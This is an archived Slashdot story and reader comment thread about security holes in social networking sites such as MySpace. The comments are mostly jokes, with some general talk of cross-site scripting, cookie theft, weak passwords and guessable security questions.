Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Social Networking Sites Full of Security Holes

CmdrTaco posted more than 7 years ago | from the 2.0-is-harder-than-1.0 dept.

Security 76

athloi writes "Social networking Web sites such as MySpace.com are increasingly juicy targets for computer hackers, who are demonstrating a pair of vulnerabilities they claim expose sensitive personal information and could be exploited by online criminals."

cancel ×

76 comments

Sorry! There are no comments related to the filter you selected.

Hey...Wait a minute (5, Funny)

UncleWilly (1128141) | more than 7 years ago | (#20132477)

First a story about how restrictive social networking sites are.

Now, so many holes in social networking sites your data is already in the hands of criminals.

Re:Hey...Wait a minute (4, Funny)

NeoTerra (986979) | more than 7 years ago | (#20132501)

It's VERY Restrictive Swiss Cheese. Kinda like Windows ME.

"It's Time for Social Networks to Open Up" (4, Funny)

Jeremiah Cornelius (137) | more than 7 years ago | (#20132565)

I laughed at this juxtaposition, too!

Hey, site vulnerabilities are an API! Right?

XSS is Web 3.0. ;-)

TAG THIS STORY, "sevenpasswords" PLEASE! (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20133237)

TAG THIS STORY, "sevenpasswords" PLEASE!

Re:"It's Time for Social Networks to Open Up" (1)

Virgil Tibbs (999791) | more than 7 years ago | (#20137157)

vulnerabilities are an API! Right?
Certainly so on the iphone

Re:Hey...Wait a minute (1)

FlatLine84 (1084689) | more than 7 years ago | (#20132509)

Anytime you put any kind of personal information on the web, pretty much anyone can see it. Hell, even Bob the hermit can have his identity stolen, and the poor guy hasn't even interacted with people in his life.

Re:Hey...Wait a minute (1)

pytheron (443963) | more than 7 years ago | (#20132579)

Indeed. Even if you are a tramp wandering the streets [telegraph.co.uk] , you are not safe from the invasive internet scourge !

Re:Hey...Wait a minute (1)

DaedalusHKX (660194) | more than 7 years ago | (#20134979)

Actually there are sites that will say you "live" in places where you may have purchased services or subscriptions for friends. Several of these have me living in towns where I've never actually set foot. I have setup services for friends of mine there... used my name as the subscriber... and WHAM... suddenly these sites list me as a resident. The abuse of data for advertising and tracking purposes is ridiculous, but until people start saying "NO", nothing will occur... for example feed the system bad info, do what you can to monkeywrench it, because the harder it is to track innocents, the sooner this nonsense will fall apart.

Networking sites are "free lobbying" for the "tracka'person" culture of "actionable intelligence gathering", which basically means that its crap, but it might serve some purpose later.

Re:Hey...Wait a minute (0, Flamebait)

utopianfiat (774016) | more than 7 years ago | (#20132539)

Heh. I'm sure those online predators are certain of how many "holes" there are in social networking sites.

Presidential Executive Order 434547621 (-1, Troll)

Anonymous Coward | more than 7 years ago | (#20132711)


All your credit card are belong to us.

Losers.

Feloniously,
President George W. Bush [whitehouse.org]

Re:Hey...Wait a minute (4, Informative)

SatanicPuppy (611928) | more than 7 years ago | (#20133319)

Hey, you gotta give 'em credit for a quick turnaround on the openness issue...Only took 'em three hours (according to story submission time) to go from closed to too open.

In the end it's hardly surprising. These sites aren't designed with security in mind, and they allow user code on the pages. Game over man, game over. Blah blah blah SSL, blah blah blah strong passwords, blah blah blah restrict user code...This stuff is all basic.

Re:Hey...Wait a minute (1)

mdwh2 (535323) | more than 7 years ago | (#20141003)

Once again - the article was about open standards, not making data publicly available. Or don't you ever mention anything personal in email?

Re:Hey...Wait a minute (1)

gravis777 (123605) | more than 7 years ago | (#20135155)

I know the feeling, I felt like I was experiencing Deja Vu. I almost glanced over the post.

My God....It's full of holes! (5, Funny)

dave-tx (684169) | more than 7 years ago | (#20132495)

Of course it's full of holes. How else would it connect to the series of tubes?

Re:My God....It's full of holes! (1)

obergfellja (947995) | more than 7 years ago | (#20132785)

when the masses flock to a location, they leave behind a big hole that they were trying to fit through... oh wait, we are talking about software? well, that will work too.

Re:My God....It's full of holes! (4, Funny)

whopub (1100981) | more than 7 years ago | (#20133175)

Of course it's full of holes.
They probably meant assholes. That would make more sense.

MySpace (0)

Anonymous Coward | more than 7 years ago | (#20132497)

So, let me get this straight... when you said MySpace, you really meant...

I'd say the real threat isn't holes, but ho's (5, Insightful)

elrous0 (869638) | more than 7 years ago | (#20132533)

It wasn't a security hole that allowed someone to blackmail Miss New Jersey [gawker.com] . The real danger of these networking sites are dumbasses who post embarassing pictures and blogs about themselves IN THE OPEN, not anything a hacker needs to dig for.

Re:I'd say the real threat isn't holes, but ho's (3, Insightful)

Spy der Mann (805235) | more than 7 years ago | (#20132963)

Yes, but assume that some sites DO implement security features like only allowing your data to be shown to your "buddies". What happens when these security measures get broken?

The other day i could watch a demonstration of a XSS attack on meebo due to lack of server-side validation.

Now add a little AI / data mining to this:

(New entry, mo/day/yr) "Here's a picture of me and my daughter Jessica playing on the NN. park" -> AI -> name: Jessica. Picture: (insert here). Last seen on: MMDDYY. Location: NN. Park.

There! You could make a database of potential victims for threats, blackmailing, and what not. The only thing that makes me feel safe is that such AI data mining technology hasn't been developed... yet.

As a rule of thumb, follow Murphy's law: What can go wrong, WILL go wrong (remember the recent SSN leaks?) Unless social networking sites have been PUBLICLY certified as having greater security than Fort Knox, stay away.

Re:I'd say the real threat isn't holes, but ho's (0)

Anonymous Coward | more than 7 years ago | (#20140723)

The only thing that makes me feel safe is that such AI data mining technology hasn't been developed... yet.

Echelon.

Tag this sevenpasswords please. (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20132535)

Tag this sevenpasswords please.

No!!! (-1, Troll)

Jethro (14165) | more than 7 years ago | (#20132537)

Hang on, hang on... let me call upon my YEARS of acting experience to put on my fake-surprised face.

Hang on... let me get into character... just a second...

THERE! That look realistically surprised to you guys?

Re:No!!! (1)

myowntrueself (607117) | more than 7 years ago | (#20134607)

THERE! That look realistically surprised to you guys?

Nah, you look more like you did in that faked YouTube video where you had a pineapple shoved up your butt.

At least I'm *assumuing* it was faked...

Re:No!!! (1)

Jethro (14165) | more than 7 years ago | (#20134769)

That wasn't my. My youtube videos involve rocket engines shoved up My Little Pony butts.

Perhaps ran into one of these (1, Interesting)

JimboFBX (1097277) | more than 7 years ago | (#20132541)

My girlfriend's MySpace page became hijacked fairly recently and was forced to post advertisements for some website. Needless to say, she knows better than to give out her username and password to any website. I also called up namecheap.com, the domain provider and complained about the website that was being advertised. Nothing will probably be done, and how this happened will probably remain a mystery. I've always wondered if myspace actually uses a challenge token to log in, and if all it takes is a replay attack to log in.

Re:Perhaps ran into one of these (3, Informative)

SatanicPuppy (611928) | more than 7 years ago | (#20133415)

It's almost always cookie cloning or password theft...That's the devil deal with Javascript, and allowing people to put their own widgets on their pages. Set up some XSS stuff [wikipedia.org] , or just make a shiny widget and put in on your page and use it to snag cookie info.

Not much you can do about it other than turn of javascript by default. It's pretty annoying actually...These vulnerablities have been known forever, but patching them would break a lot of code, so they stay open.

Re:Perhaps ran into one of these (2, Insightful)

HeavyDevelopment (1117531) | more than 7 years ago | (#20133925)

Yes turning off Javascript pretty much invalidates the whole Web 2.0 experience doesn't it? But on the other hand, you open yourself to a bunch of security issues if you don't. Quite the little conundrum....

Re:Perhaps ran into one of these (1)

GregNorc (801858) | more than 7 years ago | (#20136561)

Try NoScript. It's a firefox extension that allows you to whitelist sites that you want allowed to use javascript. Any javascript from sites not in the whitelist are denied by default.

Re:Perhaps ran into one of these (1)

Scrameustache (459504) | more than 7 years ago | (#20135227)

Not much you can do about it other than turn of javascript by default.
Well, there's NoScript [noscript.net] to let you whitelist on the fly.

Main Problem With NoScript... (0)

Anonymous Coward | more than 7 years ago | (#20136093)

Well, there's NoScript to let you whitelist on the fly.

  • About NoScript...
  • Options...
  • ---
  • Untrusted >
  • ---
  • Allow exploitmyshinymetalass.com
  • Temporarily allow exploitmyshinymetalass.com

Re:Perhaps ran into one of these (1)

DrSkwid (118965) | more than 7 years ago | (#20140205)

The widespread use of http only cookies is coming upon us

http://msdn2.microsoft.com/en-us/library/ms533046. aspx [microsoft.com]

http://www.petefreitag.com/item/644.cfm [petefreitag.com]

of course, new rushed in features open nice juicy vectors :
http://ha.ckers.org/blog/20070719/firefox-implemen ts-httponly-and-is-vulnerable-to-xmlhttprequest/ [ckers.org]

Social wants to be free. (0)

Anonymous Coward | more than 7 years ago | (#20132543)

Sounds like a good reason to join all of them together.

Well (-1, Troll)

Anonymous Coward | more than 7 years ago | (#20132555)

Only fuckwads and assholes have myspace accounts so they deserve the anal reaming hackers are going to give them. People who post personal info on such sites are complete idiots. Bottom line, they deserve what is coming to them.

Applause (1, Funny)

Anonymous Coward | more than 7 years ago | (#20132595)

I, for one, applaud these social networking sites' quick response to the call to "open up".

In other news... (0)

Anonymous Coward | more than 7 years ago | (#20132603)

Water is wet, the Pope shits in the woods, etc.

Whew! I'm Glad I'm a 15-year-old girl! (4, Funny)

filesiteguy (695431) | more than 7 years ago | (#20132623)

Fortunately, I'm only logged into those sites as a 15-year-old girl from Kansas with a dog named Toto.

At least I don't think they can get to me!

Re:Whew! I'm Glad I'm a 15-year-old girl! (5, Funny)

eln (21727) | more than 7 years ago | (#20133081)

Oh, they'll get to you.

And your little dog, too.

don't worry (1, Funny)

Anonymous Coward | more than 7 years ago | (#20134277)

I've got a bucket of water you can use, dual-purpose, works on servers and witches.

Re:Whew! I'm Glad I'm a 15-year-old girl! (0)

Anonymous Coward | more than 7 years ago | (#20137205)

Funniest one this year. Need a +10 funny.

Re:Whew! I'm Glad I'm a 15-year-old girl! (1)

Chineseyes (691744) | more than 7 years ago | (#20134747)

Since when did you start visiting slashdot Chris Hansen?

Re:Whew! I'm Glad I'm a 15-year-old girl! (0)

Anonymous Coward | more than 7 years ago | (#20137923)

14/f/cali here, let's have sex

A Net is a Bunch of Holes Sewn Together (3, Insightful)

Doc Ruby (173196) | more than 7 years ago | (#20132747)

Is giving your personal data to a company that sells it to spammers or anyone else with a buck when they start going bankrupt a "security hole"?

i wouldn't be surprised (5, Insightful)

sleekware (1109351) | more than 7 years ago | (#20132779)

i wouldn't be surprised to find out that most of the hacked accounts had passwords that were something that was listed under the favorite things on a user's profile.

Re:i wouldn't be surprised (2, Insightful)

Catil (1063380) | more than 7 years ago | (#20133333)

There is another possible "attack-vector" - most email-accounts still offer or even require a security-question like "what is my pet's name?"
Some of these can porbably be answered by anyone reading the profile or blog of someone else; and once you got access to the email-account, you could use the forgot-password-option on almost all other websites, including ebay and paypal.

Re:i wouldn't be surprised (1)

Ciarang (967337) | more than 7 years ago | (#20134417)

I would like to think that nobody here is stupid enough to give the real answers to those kind of questions. The others will have the pet's name as their password anyway, so it's irrelevant.

Re:i wouldn't be surprised (1)

mh1997 (1065630) | more than 7 years ago | (#20136299)

I would like to think that nobody here is stupid enough to give the real answers to those kind of questions. The others will have the pet's name as their password anyway, so it's irrelevant.
I went to the Paris Hilton School of IT Security and the answer to all my questions is "tinkerbell."

I know, and they keep sending me Friend requests (3, Funny)

BobMcD (601576) | more than 7 years ago | (#20132791)


Oh, wait a second, you said 'Holes'. Oh. Carry on, then...

The Humanity! (1)

Klickoris (1104419) | more than 7 years ago | (#20132833)

12 year olds everywhere will be in a riot after they hear about this.

Re:The Humanity! (0)

Anonymous Coward | more than 7 years ago | (#20134935)

Oh, look! Another teenager finds his way to Slashdot and signs up for an account... aren't we blessed?

Security Holes? (1, Funny)

Anonymous Coward | more than 7 years ago | (#20132847)

I thought it said "Social Networking Sites Full of Assholes".

perverts? (2, Funny)

ZOMFF (1011277) | more than 7 years ago | (#20132903)

So how long till the "exploiting of the holes" gets taken out of context by parents and we're doomed to another discussion of "think of the children" and "sexual predators in the tubes".

No shit, Sherlock! (0)

Anonymous Coward | more than 7 years ago | (#20132921)

How the hell do the decision makers even get jobs? Who on earth thought letting users customise HTML et al would be a good idea?

No SSL (3, Insightful)

jerbenn (903795) | more than 7 years ago | (#20132957)

How can anyone expect to keep their myspace login credentials private when they don't even have the login page SSL'd? Those bunch of retards!

'increasingly juicy targets' (1)

amrust (686727) | more than 7 years ago | (#20132987)

I'm guessing if you're searching MySpace for "juicy", then YES... you'll probably see more than a few 'security holes'. That's just the risk you take, as a user of The_Internet.

/haven't tried, myself

Stereotyping? (4, Insightful)

Andy Dodd (701) | more than 7 years ago | (#20133189)

"Yet another MySpace security hole" somehow translates to "All social networking sites are full of holes"?

Just a LITTLE bit of stereotyping in the article title I think?

Re:Stereotyping? (1)

ad0gg (594412) | more than 7 years ago | (#20135693)

Per the article, it wasn't a hole on the site. It was hole in older versions of firefox.

Holes?!?!?!?! (0)

Anonymous Coward | more than 7 years ago | (#20133207)

Giggity Giggity Giggity.

They really don't care about the end user... (2, Insightful)

DeVil.DeMonde (1128775) | more than 7 years ago | (#20133213)

What I find funny is the fact that most of the poor souls that go to such sites looking to connect with other people are on a site where the people in charge couldn't care less... I signed up for My(waste of)Space when it showed up on the net because for some people I knew it was the only means to reach them any longer. I canceled my ISP and switched since then, asking the OZ like people running the show to please update my e-mail to reflect this change, more than a year has gone by. Has my e-mail been changed? Nope. Do I waste my time on MySpace anymore? Nope.

When you refuse to acknowledge the community you "support" sub-par quality is what you must expect. Now if those MySpace people want to reach me they have to track me down via other means. To limit yourself to one medium of communication is sad anyway. Pidgin for everybody.

Re:They really don't care about the end user... (0)

Anonymous Coward | more than 7 years ago | (#20133837)

Waste of time is right...don't be a pawn in their eyeballs for ad dollars marketing schemes. Ultimately, they don't care about their users, they care about the eyeballs of the users and the advertisers who buy ads. Besides, who would want to make it easier for anybody and their brother to track their movements throughout their daily lives? There are absolutely people out there that will abuse that information, so don't go to extra trouble to make it easier for them to find it...be unknown and anonymous (unless you plan to get into politics) its much safer that way.

Re:They really don't care about the end user... (1)

rainmayun (842754) | more than 7 years ago | (#20134687)

To play devil's advocate, how could they reasonably have differentiated you from a malicious user intent on subverting someone else's account?

Re:They really don't care about the end user... (1)

DeVil.DeMonde (1128775) | more than 7 years ago | (#20134925)

To play devil's advocate, how could they reasonably have differentiated you from a malicious user intent on subverting someone else's account?
Erm, since I was actually logged into the account and provided everything they had asked for it might have been grounds for them to approve such a request thereby proving my identity... But then again you are right, from the eyes of the truly security conscious there is no way. Be sure I won't be e-mailing or faxing anybody a copy of my ID anytime soon, let alone divulging personal information on the internet to anybody in the name of security or not. Disturbing in the digiworld there is no real way for you to prove you are you, or I am me, without giving up potentially harmful personal information. A thumb print scanner for identification verification to log onto sites would be really impractical (though neat). Maybe I'm not me, maybe I'm you pretending to be me, or me pretending to be you pretending to be me. *Begins to observe the entity he thinks he might be start to have a serious identity crisis.* I think therefor I am, but I mean who am I anyway, who is anybody...? I need my tinfoil hat...

Full of holes? No problem... (5, Funny)

veganboyjosh (896761) | more than 7 years ago | (#20133499)

This error has been sent to myspace.com's technical department.

I'm sure Tom will get right on it.

Re:Full of holes? No problem... (1)

kaizokuace (1082079) | more than 7 years ago | (#20137243)

oh that rascally Tom!

A patch has been issued (1, Funny)

Anonymous Coward | more than 7 years ago | (#20133653)

Get the end users to install curtains and a dog.

Myspace hole that's funny (2, Informative)

British (51765) | more than 7 years ago | (#20133727)

There's a feature where in Myspace you can set all your pictures to "private". But most idiots on myspace insist on having a myspace slide show on their profile page(along with 2000 other flash applets). Click on the picture in the slideshow, now you can see the album! Just use previous/next to navigate through them.

Then there was the time I was on myspace, and a banner ad tried to send me a virus. You would think Myspace would be a bit more discretionary who it lets send banners over. Tsk tsk!

Of course, not as fun as the images directory being left open on all angelfire pages. Some of those were fun to sort through, showing pictures not intended for the public(ie nudity, etc).

Spam Databases (0)

Anonymous Coward | more than 7 years ago | (#20133785)

Sod the whole identity theft aspect. Just think of the potential in these databases for spam. A list of names+email complete with links of who knows who.

Suddenly spam is coming from your (spoofed) best friend's email, with their name and yours in it: "Hey man, I just bought one of these and it's awesome"

Email would become a nearly unusable thing for these people.

News? (1)

Geekbot (641878) | more than 7 years ago | (#20133939)

More like olds. This is like complaining that geocities is full of hacks.

But Celebrities are doing it... (1)

starwarsfans (921179) | more than 7 years ago | (#20134161)

...Therefore, it must be a safe and smart thing to do. My Manager suggested I create a MySpace account to market myself to a broader audience. Buzz!!! Wrong answer, idiot!

I wouldn't call it a security flaw (1)

corifornia (995298) | more than 7 years ago | (#20134323)

Not that I give two rat's dicks about MySpace, but if you read the article the flaw only works in Firefux and requires the end user to click a link. Its pretty hard to patch holes when its an ID-10T flaw in one of your users. Oh, and the guy in the picture has a crappy hair cut, he looks like hes interested in finding a lot 'tighter' holes than the ones that he's found, probably on a 11 year old (gender open).

user-submitted HTML content bad (2, Insightful)

rainmayun (842754) | more than 7 years ago | (#20134399)

Well of course they are. Any site that allows random users to post HTML content that then gets embedded in the site's pages (especially as extensively as sites like Myspace, etc allow it) is going to be subject to security flaws. Moral of the story: browse such sites using a secure browser, at least as secure a browser as you can find.

you FAIL it.. (-1, Flamebait)

Anonymous Coward | more than 7 years ago | (#20134491)

[nero-online.org]. your own towel in w4s after a long

That's not nice to the girls. (1)

kinglink (195330) | more than 7 years ago | (#20134657)

Seriously I know they aren't exactly the most prudish, but calling them holes is just crude.

Oh we're talking about security? My bad.

Try Deleting Your Facebook Account (2, Informative)

kellyb9 (954229) | more than 7 years ago | (#20135183)

I recall reading a story recently regarding this issue. From a girl's facebook account, researchers had enough information to steal her identity in 15 minutes. On a side note: I am not able to delete my facebook account. To fully delete it, I have to remove everything from my wall and every friend, I've ever had. Don't really want to do that. I can "disable" it. Personally, i would just like to be removed from their database. No seriously - i sent them the SQL statement that would probably take care of it. I fully detest facebook.

Stop the presses! (1)

Groggnrath (1089073) | more than 7 years ago | (#20136443)

A site where you put in your name, age, and location, for the soul purpose of meeting people is unsecured?

What sort of fiend would pray on people who clearly state there name, address, age, and often occupation, hangouts, favorite things.

I mean really, how much security did you expect. There is no anonymity on Myspace or Flicker, so who the hell would be surprised when it gets hacked. There are probably a million people out there that hate Myspace (or flicker/other social sites) some of them must have the desire to program with malicious intent. It's a big fat whale carcase just waiting for the sharks to arrive.

MySpace is the boogeyman (1)

Ayeffkay (1139265) | more than 7 years ago | (#20138157)

I work at a computer repair shop, and every single day I hear some variation of "as soon as you log in to MySpace you open a port in your firewall and that's why you have a virus." I've been asked before to block MySpace on customers' systems. My boss has complained that the store's computer has errors because someone logged on to MySpace (it has nothing to do with the 500+GB of customer backups on the system, because they're not on the same hard drive as Windows).

And now you go and post this? Despite the headline having no real basis in the article, and that the context implies that this exploit is not in the wild yet, it's going to be used to justify every past and future accusation.

If I'm lucky, my employers will only knee-jerk at the headline. If not, they'll read the entire article, knee-jerk at the headline anyway, and based on the statement, "it only affects older versions of the Firefox Web browser and does not affect Internet Explorer," argue that IE is superior in every way to Firefox. Just watch.

Thanks a lot, /.

Re:MySpace is the boogeyman (0)

Anonymous Coward | more than 7 years ago | (#20139821)

STFU, whiner.
Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>